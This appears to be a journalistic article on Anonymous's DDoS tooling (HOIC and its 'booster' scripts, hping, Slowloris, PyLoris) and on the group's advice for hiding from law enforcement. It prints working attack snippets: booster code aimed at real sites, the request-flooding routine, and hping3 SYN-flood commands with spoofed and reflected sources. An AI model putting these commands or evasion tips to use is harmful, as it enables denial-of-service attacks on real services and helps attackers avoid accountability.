Most members of Anonymous would prefer to stay, well, anonymous. But as the group has engaged in increasingly high-profile attacks on government and corporate websites, doing so effectively and staying out of harm’s way have become an ever-growing challenge. To protect itself, the group has altered its tactics over the past year to both increase the firepower of its attacks and shield members from the prying eyes of law enforcement.

In late 2011, members of Anonymous began to step away from their most well-known weapon for distributed denial of service attacks. While some in the group continued to try to get enthusiastic followers (or unwary webpage visitors) to use a Web browser version of the Low Orbit Ion Cannon attack tool, use of LOIC had led to the arrests of members of Anonymous and LulzSec last summer. More cautious and technically skilled Anons started to use a collection of other tools and security practices to both step up attacks and hide themselves from being tracked. A message spread through Anonymous’ IRC channels spells it out: “Do NOT use LOIC.”

The attacks on the websites of the Justice Department and others in the wake of the takedown of Megaupload.com were the first demonstration of the power of LOIC’s successor—a DDoS tool called the High Orbit Ion Cannon.

HOIC isn’t exactly rocket science. At its core, it is essentially a simple script for launching HTTP POST and GET requests at a targeted server, wrapped in a “lulz” friendly graphical interface. According to the documentation, it can be used to open up 256 attack sessions simultaneously—either targeting a single server, or going after multiple targets. The user can control the number of threads used per attack.

This rocket needs boosters

The code itself isn’t that sophisticated. HOIC is written in Basic—or, to be more accurate, Real Software’s Real Basic, the cross-platform version of the language originally developed for the Mac. The main power of HOIC is that it can be customized for each attack target relatively easily without having to know how to code, using “boosters,” modules with additional bits of Basic code that are interpreted at runtime.

HOIC’s boosters are used to tailor the HTTP requests sent by HOIC to the target for a specific type of attack. ”HOIC is pretty useless,” the documentation file that comes with the code says, “unless it is used in combination with ‘Boosters.’” And that’s putting it mildly—the attack code is generated based completely on what’s in the booster file. When an attack is launched, HOIC compiles the booster to create the HTTP headers to be sent, and sets the mode of the attack.

One approach commonly used in boosters is to create randomized requests in an attempt to defeat any content delivery network (CDN) or caching used to shield the server from traffic spikes. Some boosters use lists of URLs within a target site, appending them to a table in memory to be used by the attack thread:

// populate rotating urls
randURLs.Append "http://www.om.nl/"
randURLs.Append "http://www.om.nl/onderwerpen/cybercrime/"

The script also can include a randomized list of user agents, referring sites and random headers that are fed into HTTP requests to make the requests look more legitimate:

useragents.Append " Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
useragents.Append " Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
referers.Append " http://www.google.com/?q=" +URL

The booster script can also include parameters to set the volume of the attack, and to switch between GET and POST requests. For example, here’s the booster set up to attack a dynamic part of Visa’s webpage, using POST, complete with a form submission to the target page:
UsePost = true
Headers.Append(" User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101027 Firefox/3.6.12" )
Headers.Append(" Keep-Alive: 115")
Headers.Append("Proxy-Connection: keep-alive")

Headers.Append(" Referer: http://visa.via.infonow.net/locator/global/AdvancedSearchAction.do")

Headers.Append(" Cookie: JSESSIONID=5D2E604F487FB5AC9DBF9A1FDEA7D86A.fta-web3" )

URL = "http://visa.via.infonow.net/locator/global/AdvancedSearchAction.do"

PostBuffer = "newSearch=true&airport=&pageid=adv&filteredNameSubmit=false&LOC=en_US&country=CHE&street1=2353464756867867876886786777777777777777777777777777786&building=&city=aaaaaaaaaaaaaaa&initialSearchName=&mapAndList=mapAndList&x=27&y=9"


While the scripts themselves can get fairly sophisticated in how they’re configured, a generic booster file distributed with HOIC makes it fairly simple for would-be DDoSers to build a custom booster for their target of ire of the moment and distribute it via a shared document site like PasteBin, Google Documents, or an Etherpad site. For example, when a hungry Anon got upset about a late pizza delivery on Valentine’s Day, he quickly shared a clip of Web addresses to start an impromptu DDoS on Pizza Hut.
The actual code that runs the attacks is executed as threads by a set of timers. ObjTarget.SendAttack is pretty straightforward:
'Creating the socket request
  Dim httpObj as HTTPSocket
  Dim i as integer
  Dim reqSize as integer = 0
  httpObj = New HTTPSocket
  
  ' Adding the headers generated by the booster
  for i = 0 to Headers.Ubound
    reqSize = reqSize + Headers(i).Len
    httpObj.SetRequestHeader(Headers(i).Left(Headers(i).InStr(":")-1), Headers(i).Mid(Headers(i).InStr(":")+1, Headers(i).Len - Headers(i).InStr(":")))
  Next
  
'For attacks wher POST has been chosen as the type of HTTP request
  if(UsePost) then
    reqSize = reqSize + PostBuffer.Len + 4 ' POST
    httpObj.SetPostContent(PostBuffer, "application/x-www-form-urlencoded")
    httpobj.Post URL
'For GET based attacks
  else
    reqSize = reqSize + 3 ' GET
    httpobj.Get URL
  end if
  
 'Tracking how much data has been sent to the target 
  TotalBytesSent = TotalBytesSent + reqSize


But Hoic isn’t the only tool that Anons are promoting. 


The old(er) bag of tricks
Despite its improved attacks, HOIC still points an arrow straight back at the source of the DDoS. And some of the targets Anonymous’ various #Ops are
going after aren’t suitable for straight-up HTTP attacks. So there are two other tools that have been tossed into Anon’s #Setup recommendations that
aren’t exactly new to the security world: Hping and Slowloris, a pair of network security testing tools that also have the potential to be used for evil.
Hping is a TCP/IP "packet assembler and analyzer" initially developed and now maintained by Salvatore Sanfillipo, a Sicilian programmer. It uses a command-line interface similar to that
of the pingnetwork utility, but it can do a lot more than make ICMP echo requests. It can be used to throw high volumes
of TCP requests at a target, while masking the source of the attack through spoofing,
as Anonymous’ tutorial shows:
 ### Normal hping DoS attack:
hping3 -S -i
u100 riaa.org

### Spoofed
random source address attack:
hping3 -S -i
u100 riaa.org --rand-source

###
Reflected attack(it looks like mpaa.org is DoS'ing riaa.org)
hping3 -S -i
u100 riaa.org -a mpaa.org

Slowloris is a different sort of attack entirely—a slow HTTP attack that uses partial HTTP requests to a server, making it wait for more chunks of the
request and slowly spooning them out to keep the IP socket on the server open. This type of attack works best against low-traffic sites on Apache and a variety
of other Web servers by eating up available network ports on the server. It’s ideal for attacks on servers in places where there’s a concern about there
being enough bandwidth for a brute-force DDoS to succeed, or where there’s concern about the collateral damage to other users on the same network. That’s
why Slowloris was used against Iranian servers during the protests around the Iranian elections in 2009.
But Slowloris is not a tool for the masses. It requires Perl, and runs best on Linux. The author of Slowloris, known as RSnake, said that Windows users “will not be able to successfully execute a
Slowloris denial of service from Windows…because Slowloris requires more than a few hundred sockets to work (sometimes a thousand or more), and Windows limits
sockets to around 130, from what I've seen.”
However, a Python-based version of the exploit, PyLoris, gets around those limitations. It has a graphical interface, and can be used
effectively from Windows; Christopher Gilbert, the developer of PyLoris, claims he’s tested PyLoris on Windows with "over 6000 connections, and [doesn’t] see why it couldn’t use
more than that."
PyLoris also includes a feature called TOR Switcher, which allows attacks to be carried out over the anonymized Tor Network and switch between Tor
"identities," changing the apparent location the attack is coming from at user-defined intervals.

A screenshot of PyLoris in action

Used individually, these tools can be somewhat effective in slowing down many of the sites that Anonymous targets. But as Curt Wilson, a researcher with Arbor Networks’ Security
Engineering and Response Team, said to Ars in an interview, "If you use volumetric floods on top of specific application attacks [like Slowloris], it’s
a pretty powerful combination."
And just by the sheer number of attacking systems that Anonymous can bring aboard to launch
these attacks when its members and friends are highly motivated—as in the wake of the Megaupload shutdown—even the most basic of tools can cause problems for
large websites.

Covering the trail
There is still the matter of being able to pull off these large attacks with volunteered computers and keeping those volunteers anonymous. While Hping can provide some
obscuring of the source of an attack, the other tools point straight back at their source. So Anons have been eager to find ways to keep their IP addresses
concealed.
The problem is that freely available anonymizing networks generally aren’t up to the task of
handling the bandwidth of DOS attacks. Attempting to launch HOIC or other DDoS tools over Tor would amount to an attack on that network itself—and on the
Anonymous members who use it to protect themselves. So with the exception of Slowloris and PyLoris attacks, which demand relatively little bandwidth, the
Anonymous edict is “DO NOT DOS THROUGH TOR.”
Some Anons have turned to a variety of proxy tools—including a fairly suspicious commercial software package called AutoHideIP, which claims to anonymize users by connecting them through proxies for a one-time fee, even selecting the country
from which their IP address appears to be located. Efforts by Ars to contact the creators of AutoHideIP, Coolware Max, were unsuccessful.
But there’s reason to be suspicious of the security of proxy services, and of other anonymizing services such as VPNs, because they could be compelled by law
enforcement to turn over traffic logs. That was the case in the arrest of one alleged LulzSec member, who was apprehended after VPN provider HideMyAss.com turned
over log data that helped trace him to Arizona.
For that reason, Anonymous’ best-practice advice for members is to stick to Anonine and VPNTunnel, two paid VPN-based anonymizing services based in Sweden — where privacy laws don’t require providers to keep
access logs (and in some cases prohibit it).
Both of the services are based on OpenVPN, a GPL-based open source virtual private network technology available on Windows, MacOS and
Linux. However, as Anonine has expanded service beyond Sweden, with servers available worldwide, some of its servers have started to keep logs in
accordance with local laws—so Anonymous’ members are warned to specifically configure their clients for Swedish servers.